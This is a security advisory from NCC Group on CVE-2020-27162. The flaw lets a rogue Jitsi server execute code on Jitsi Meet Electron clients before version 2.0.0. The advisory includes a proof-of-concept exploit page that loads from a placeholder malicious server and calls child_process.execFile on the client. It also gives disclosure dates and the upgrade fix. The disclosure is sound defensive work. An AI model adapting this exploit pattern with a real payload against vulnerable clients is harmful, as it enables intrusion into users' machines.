Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code Execution (CVE-2020-27162)

Current Vendor: Jitsi
Vendor URL: https://jitsi.org
Versions affected: 1.x.x
Systems Affected: Jitsi Meet Electron
Authors: Robert Wessen robert[dot]wessen[at]nccgroup[dot]com
CVE Identifier: CVE-2020-27162
Risk: 8.3 (High) – AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Summary

Jitsi is an open source online communication suite. It includes a variety of audio, video, text and screen sharing capabilities. Both server, client, and libraries for third party application are included in the suite. Jitsi Meet is a web service based video conferencing solution within this suite. The Jitsi Meet server is open source and anyone can run a Jitsi Meet server to provide video conferencing services. Jitsi Meet can be accessed through a web browser, mobile apps and a native desktop application.

Jitsi Meet Electron[1] is the cross-platform native application for Windows, OSX and Linux, designed to work with a Jitsi Meet server to facilitate video conferencing and screen sharing. As the name implies, it is written using the Node.js based Electron framework.

Electron has a history of security issues primarily based around its blending of remote web content and the integration of native Node.js libraries. Jitsi Meet Electron does not follow current Electron security best practices for secure configuration[2] and as a result, it is possible for any Jitsi Meet server to execute arbitrary code on any Jitsi Meet Electron client which connects to it. This also means any XSS within the Jitsi Meet server will result in code execution on connected electron clients. No such XSS is currently known. Jitsi Meet is designed to be deployed easily by any organization and has seen increase in attention due to an increase in remote solutions in the Spring of 2020.

[1] https://github.com/jitsi/jitsi-meet-electron
[2] https://www.electronjs.org/docs/tutorial/security

Impact

Jitsi Meet Electron before 2.0.0 allows full Node.js integration in the Electron mainWindow Chrome renderer process and loads remote, content into that renderer. Successful exploitation of this vulnerability by a rogue Jitsi server leads to remote code execution on connected, vulnerable client systems.

Details

https://github.com/jitsi/jitsi-meet-electron/blob/40866232594442ea77d5144deebcd38ed3d362be/main.js#L126

This set of Electron BrowserWindow options, when invoked on the version of Electron in use follows a now deprecated design pattern which allows for remote content to directly access native Node.js methods. A malicious server can abuse this to access Node.js methods to execute commands on the client system.

If a malicious server included such code upon a client connecting, the server operator can gain code execution on any client system connecting with the Jitsi Meet Electron application. The following code demonstrates a PoC for writing a file via an external shell command.

First the server can return JavaScript to open a malicious page in the Electron renderer.

window.open("https://{maliciousserver}/exploitme.html", "_self" , "", true);

That code can load a page which attempts to traverse up window.parent until it finds a window with full access to native Node.js libraries. When it finds such a window, it calls the Node.js child_process.execFile() method to execute code on the client’s operating system.

exploitme.html

try{
const execFile = require('child_process').execFile;
const child = execFile(
'touch',
['/tmp/jitsi_electron'],
(error, stdout, stderr) => {});
}catch(err){
parent.location = window.location;
}

On the local client machine, the touch command executes and the following file is written.

$ ls -la /tmp/ | grep jitsi
-rw-r--r-- 1 user user 0 Apr 2 12:25 jitsi_electron

Recommendation

Upgrade to version 2.0.0 or higher of the Jitsi Meet Electron client. If this cannot be accomplished, do not connect to untrusted Jitsi Meet servers.

Vendor Communication

4/3/20 – Emailed Jitsi security contact address.
4/3/20 – Reply from Jitsi with PGP key.
4/3/20 – PoC and Draft Advisory shared by NCC Group.
4/7/20 – Jitsi released a beta build with a fix.
4/7/20 – NCC confirmed this addressed the immediate design issue but noted attention should be focused on the preload.js script as this is where vulnerabilities may still be introduced.
4/8/20 – Jitsi version 2.0.0 released, addressing the identified legacy design issue and implemented the currently recommended Electron reference security approach. However, due to auto-upgrade and software signing key challenges, Jitsi requested time for this new release to propagate before publishing a technical advisory, NCC agreed.
7/1/20 – Jitsi addressed several independently reported, additional vulnerabilities in the preload.js script with version 2.3.0.
10/15/20 – CVE identifiers obtained.
10/22/20 – Public release of NCC Group technical advisory.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.